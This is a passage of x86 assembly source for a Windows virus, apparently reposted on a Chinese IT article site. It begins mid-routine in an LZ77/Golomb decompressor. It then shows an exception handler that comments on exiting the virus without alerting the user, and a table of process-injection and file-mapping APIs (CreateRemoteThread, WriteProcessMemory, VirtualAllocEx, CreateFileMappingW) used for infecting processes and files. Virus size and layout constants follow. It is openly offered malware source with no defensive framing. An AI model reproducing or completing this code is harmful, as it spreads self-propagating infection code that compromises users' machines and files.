  add edx, eax
  jmp lb_L2_b
lb_L2_a:
  cmp eax, -MAX_WND_SIZE
  jge lb_L2_b
  xor edx, edx
lb_L2_b:

  push edx

  mov ecx, OFFSET_CODING_LENGTH
  call ReadBitsFromBitStream

  push eax
  call ReadGolombCode
  pop eax

  xchg esi, [esp]
  add esi, eax
  add [ebp][iSlideWindowPtr], ecx
  add [ebp][ulBytesDecoded], ecx

lp_CopyingString:

  mov al, [esi]
  mov [edi], al
  inc esi
  inc edi
  loop lp_CopyingString

  pop esi


  jmp lb_LZ77Decompress


lb_SingleCharacter:

  mov ecx, 8
  call ReadBitsFromBitStream

  mov [edi], al
  inc edi
  inc dword ptr [ebp][iSlideWindowPtr]
  inc dword ptr [ebp][ulBytesDecoded]

  jmp lb_LZ77Decompress

lb_AllDataDecompressed:

  mov eax, [ebp][ulBytesDecoded]
  mov ecx, [ebp][pulNumberOfBytes]
  jecxz lb_NumberOfBytesNotRequiredReturned
  mov [ecx], eax

lb_NumberOfBytesNotRequiredReturned:

  mov esp, ebp
  popad
  ret 16


ReadBitFromBitStream:

  push ecx

  mov eax, ebx
  shr eax, 3
  add eax, esi
  mov ecx, ebx
  and ecx, 7
  mov eax, [eax]
  shr eax, cl
  and eax, 1

  pop ecx
  inc ebx

  ret


ReadBitsFromBitStream:

  push edi
  push edx

  xor edx, edx
  xor edi, edi
  xchg ecx, edi

lb_LoopOfReadBits:

  call ReadBitFromBitStream
  shl eax, cl
  or edx, eax

  inc ecx
  dec edi
  jnz lb_LoopOfReadBits

  mov eax, edx
  pop edx
  pop edi
  ret


;*********************************************************************
;*                                                                   *
;* ReadGolombCode()                                                 *
;*                                                                   *
;* Remarks:                                                         *
;*  Read the Golomb code from the bit stream.                    *
;*                                                                   *
;* Parameters:                                                      *
;*  [Esi]                                                        *
;*  Point to start address of the bit stream.                    *
;*  [Ebx]                                                        *
;*  The offset in the bit stream where the Golomb code will      *
;*  be read from.                                                *
;*                                                                   *
;* Return value:                                                    *
;*  [Ecx]                                                        *
;*  The decoding value                                           *
;*                                                                   *
;*********************************************************************
ReadGolombCode:

  xor edx, edx

lb_ReadNextBitUntil0IsFound:

  call ReadBitFromBitStream
  test eax, eax
  jz lb_ZeroBitIsFound
  inc edx
  jmp lb_ReadNextBitUntil0IsFound

lb_ZeroBitIsFound:

  push edx

  xor ecx, ecx
  xor edx, edx

lb_LoopOfDecodingR:

  call ReadBitFromBitStream
  shl eax, cl
  or edx, eax
  inc ecx
  cmp ecx, M
  jb lb_LoopOfDecodingR

  mov ecx, edx
  pop edx
  shl edx, M
  lea ecx, [ecx+edx+1]
  ret

;//}

;*********************************************************************
;* ExceptionHandler:
;*
;*  The exception-handing routine. When something unnormal
;*  occurs anyway, the routine is called by the system. We will
;*  do some processings here and then quit our virus program
;*  without causing the user's cautions.
;
;* Parameters:
;*
;*  fs:[0]: Point the memory unit where the ESP register is
;*  saved. The value of the ESP register is equal to the one
;*  when the exception occurs.
;*
;* Return Value:
;*
;*  None
;*
;*
;*********************************************************************
ExceptionHandler:

if DEBUG
  push 0
  push offset szError
  push offset szExceptionCaused
  push 0
  call MessageBoxA
endif

  xor ebx,ebx
  mov eax, fs:[ebx]
  mov esp, [eax]

  jmp lb_ExitVirusProgram


NameOfKernel32   db 'Kernel32.dll', 0

if DEBUG
 TargetProcessName db 'mm.exe', 0
endif

        db 'prcv'
        db (MajorVersion + 00000030h)
        db '.'
        db (MinorVersion + 00000030h)

n_GetModuleHandleA    db 'GetModuleHandleA', 0
n_GetProcAddress    db 'GetProcAddress', 0
n_CreateToolhelp32Snapshot   db 'CreateToolhelp32Snapshot', 0
n_Process32First    db 'Process32First', 0
n_Process32Next     db 'Process32Next', 0
n_Module32First     db 'Module32First', 0
n_Module32Next     db 'Module32Next', 0
n_CloseHandle     db 'CloseHandle', 0
n_OpenProcess     db 'OpenProcess', 0
n_CreateRemoteThread   db 'CreateRemoteThread', 0
n_VirtualProtectEx    db 'VirtualProtectEx', 0
n_VirtualAllocEx    db 'VirtualAllocEx', 0
n_VirtualFreeEx     db 'VirtualFreeEx', 0
n_WriteProcessMemory   db 'WriteProcessMemory', 0
n_CreateFileA     db 'CreateFileA', 0
n_CreateFileW     db 'CreateFileW', 0
n_CreateFileMapping    db 'CreateFileMappingW', 0
n_MapViewOfFile     db 'MapViewOfFile', 0
n_UnmapViewOfFile    db 'UnmapViewOfFile', 0
n_GetFileAttributes    db 'GetFileAttributesW', 0
n_SetFileAttributes    db 'SetFileAttributesW', 0
n_GetFileSize     db 'GetFileSize', 0
n_MultiByteToWideChar   db 'MultiByteToWideChar', 0
ife SKIP_CURRENT_PROCESS
n_GetCurrentProcessId   db 'GetCurrentProcessId', 0
endif
if ERROR_DIAGNOSE
n_GetLastError     db 'GetLastError', 0
endif

if NOT_INFECT_FILES
LogFileName      db 'c:\openlog.txt', 0
endif

RelativeBase  =  @B
; import-function string offset table
IfNameTable   dd n_GetModuleHandleA    - RelativeBase
     dd n_GetProcAddress    - RelativeBase
     dd n_CreateToolhelp32Snapshot - RelativeBase
     dd n_Process32First   - RelativeBase
     dd n_Process32Next    - RelativeBase
     dd n_Module32First    - RelativeBase
     dd n_Module32Next    - RelativeBase
     dd n_CloseHandle    - RelativeBase
     dd n_OpenProcess    - RelativeBase
     dd n_CreateRemoteThread  - RelativeBase
     dd n_VirtualProtectEx   - RelativeBase
     dd n_VirtualAllocEx   - RelativeBase
     dd n_VirtualFreeEx    - RelativeBase
     dd n_WriteProcessMemory  - RelativeBase
if NOT_INFECT_FILES
     dd n_CreateFileA    - RelativeBase
endif
     dd n_CreateFileW    - RelativeBase
     dd n_CreateFileMapping   - RelativeBase
     dd n_MapViewOfFile    - RelativeBase
     dd n_UnmapViewOfFile   - RelativeBase
     dd n_GetFileAttributes   - RelativeBase
     dd n_SetFileAttributes   - RelativeBase
     dd n_GetFileSize    - RelativeBase
     dd n_MultiByteToWideChar  - RelativeBase
ife SKIP_CURRENT_PROCESS
     dd n_GetCurrentProcessId  - RelativeBase
endif
if ERROR_DIAGNOSE
     dd n_GetLastError    - RelativeBase
endif
     dd 0 ; 0 meaning the end of the table
IsBusy    db 0

CallAddressTable = $
@X = $
lpfnGetModuleHandleA   dd ?
lpfnGetProcAddress    dd ?
lpfnCreateToolhelp32Snapshot dd ?
lpfnProcess32First    dd ?
lpfnProcess32Next    dd ?
lpfnModule32First    dd ?
lpfnModule32Next    dd ?
lpfnCloseHandle     dd ?
lpfnOpenProcess     dd ?
lpfnCreateRemoteThread   dd ?
lpfnVirtualProtectEx   dd ?
lpfnVirtualAllocEx    dd ?
lpfnVirtualFreeEx    dd ?
lpfnWriteProcessMemory   dd ?
if NOT_INFECT_FILES
lpfnCreateFileA     dd ?
endif
lpfnCreateFileW     dd ?
lpfnCreateFileMappingW   dd ?
lpfnMapViewOfFile    dd ?
lpfnUnmapViewOfFile    dd ?
lpfnGetFileAttributesW   dd ?
lpfnSetFileAttributesW   dd ?
lpfnGetFileSize     dd ?
lpfnMultiByteToWideChar   dd ?
ife SKIP_CURRENT_PROCESS
lpfnGetCurrentProcessId   dd ?
endif
if ERROR_DIAGNOSE
lpfnGetLastError    dd ?
endif


VIRUS_PHYSICAL_SIZE = $ - BaseOfVirusCode
VIRUS_VIRTUAL_SIZE = 00001000h
VIRUS_ALIGN_SIZE = (VIRUS_VIRTUAL_SIZE + MAX_SIZE_COMPRESSED + 00000400h)
VIRUS_BOOTING_SIZE = (VIRUS_VIRTUAL_SIZE + MAX_SIZE_COMPRESSED)

DynamicDataArea = $

ReturnValueFromRemoteProcess dd  ?
dwOldProtect     dd  ?
ProcessEntry32    = $
  pe_dwSize   = ProcessEntry32 + 0000h
  pe_th32ProcessID = ProcessEntry32 + 0008h
  pe_szExeFile  = ProcessEntry32 + 0024h

ife NOT_INFECT_FILES
ModuleEntry32    = $
else
ModuleEntry32    = $ + 00000128h
endif
  me_dwSize   = ModuleEntry32 + 0000h
  me_modBaseAddr  = ModuleEntry32 + 0014h

PADDING_DATA_LENGTH = (VIRUS_ALIGN_SIZE-($-BaseOfVirusCode))

PaddingData   db (PADDING_DATA_LENGTH) dup (0)

; _______________________________________________  ___
;|(0x0000)                                       |  |
;|                                               |  |
;|                 Virus Code                    |  | 00001000h
;|                                               |  |
;|_______________________________________________| _|_
;|(0x1000)                                       |  |
;|                                               |  |
;|         Buffer For Data Compressed            |  | 00004000h
;|                                               |  |
;|                                               |  |
;|                                               |  |
;|                                               |  |
;|                                               |  |
;|_______________________________________________| _|_

DOS_HAEDER_SIZE     = 00000040h
SIZE_OF_IMPORT_DESCRIPTOR  = 00000014h
SIZE_OF_IMAGE_SECTION_HEADER = 00000028h
MAX_SIZE_TO_COMPRESS   = 00004000h
MAX_SIZE_COMPRESSED    = 00004000h

DELTA_X       = BaseOfVirusCode - @X
lpBufferForDataCompressed  = DELTA_X + 00001000h

VirSegment ends


end VirtualEntry

本文地址:http://com.8s8s.com/it/it23137.htm